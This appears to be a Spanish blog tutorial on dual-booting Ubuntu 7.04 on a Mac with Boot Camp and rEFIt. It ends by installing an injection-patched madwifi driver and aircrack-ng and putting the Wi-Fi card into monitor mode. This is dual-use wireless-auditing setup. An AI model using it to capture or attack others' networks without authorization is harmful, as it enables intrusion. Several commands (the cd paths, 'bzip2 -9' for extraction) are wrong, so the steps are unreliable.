2) Busca la actualización de firmware de tu ordenador. Por ejemplo, busca "Mac mini firmware update".
3) Descarga el paquete de actualización del firmware
4) Abre el paquete y sigue las instrucciones que aparecerán en la pantalla.
A continuación particionamos el disco duro del mac , para esto nos bajamos boot camp de aquí:
http://www.apple.com/es/macosx/bootcamp/
Lo instalamos y particionamos , es muy sencillo , solo hay que dejar el espacio suficiente para que entre un sistema Linux y su swap , con 4 gigas vamos bien.
Esto nos sirve únicamente para poder utilizar parte de el disco duro de nuestro mac , ya que durante la instalación de Linux tendremos que formatear esa parte de disco en las dos particiones necesarias para nuestra instalación y nuestro mac seguirá pensando que es con Guindos con quien comparte disco...
Seguidamente instalamos refit, es un gestor de arranque para mac, el cual podemos descargar de aquí:
http://refit.sourceforge.net/
http://prdownloads.sourceforge.net/refit/rEFIt-0.9.dmg?download
Instalación de Linux
Una vez particionado el disco e instalado el gestor solo nos resta instalar Linux , yo he instalado Ubuntu 7.04 , el cual podeis bajar de aquí :
http://www.ubuntu.com/getubuntu/download
Para arrancar un live cd en Mac, introducimos el cd , reiniciamos y presionamos durante el arranque la tecla 'C' .
La instalación , incluida la partición de la porción de disco que hemos quitado a Macintosh es practica mente idéntica a la de este hilo :
http://foro.elhacker.net/index.php/topic,139111.0.html
Solo que hay que reparticionar la partición que dejamos para Guindos con boot camp.
Necesitamos una partición de al menos 3 gigas en ext3 a la cual hay que asignar la raiz '/' y otra swap de al menos nuestra RAM .
Esta es mi tabla de particiones:
Os recomiendo que durante la instalación estéis conectados a inet por cable.
Una vez instalado Linux , reiniciamos tal y como nos dice el instalador , al reiniciar aparecerá el gestor de arranque refit con este aspecto :
Por supuesto elegimos Linux para el arranque y nos preparamos para actualizar el sistema e instalar el driver para nuestra Airport .
Abrimos una shell y tecleamos lo siguiente como root :
Código:
apt-get install linux-headers-`uname -r` build-essential
ln -s /usr/src/linux-`uname -r` /usr/src/linux
Seguidamente:
Código:
mkdir ~/wifi
cd /wifi
wget http://downloads.sourceforge.net/madwifi/madwifi-0.9.3.1.tar.bz2?modtime=1179910664&big_mirror=0
wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
Instalamos los driver:
Código:
bzip2 -9 madwifi-0.9.3.1.tar.bz2
tar -xvf madwifi-0.9.3.1.tar
cd /madwifi-ng-r2379-20070527
patch -Np1 -i ../madwifi-ng-r2277.patch
make
make install
depmod -ae
modprobe ath_pci
Instalamos aircrack-ng:
Código:
cd ..
tar zxvf aircrack-ng-0.9.tar.gz
cd aircrack-ng-0.9/
make && make install
Para poner el dispositivo en modo monitor :
Código:
airmon-ng start wifi0
Link's interesantes:
http://www.faq-mac.com/mt/archives/016727.php
http://hwagm.elhacker.net/drivers-ng/driver-ng.htm
Espero que os sea de utilidad
Suscribirse a:
Entradas (Atom)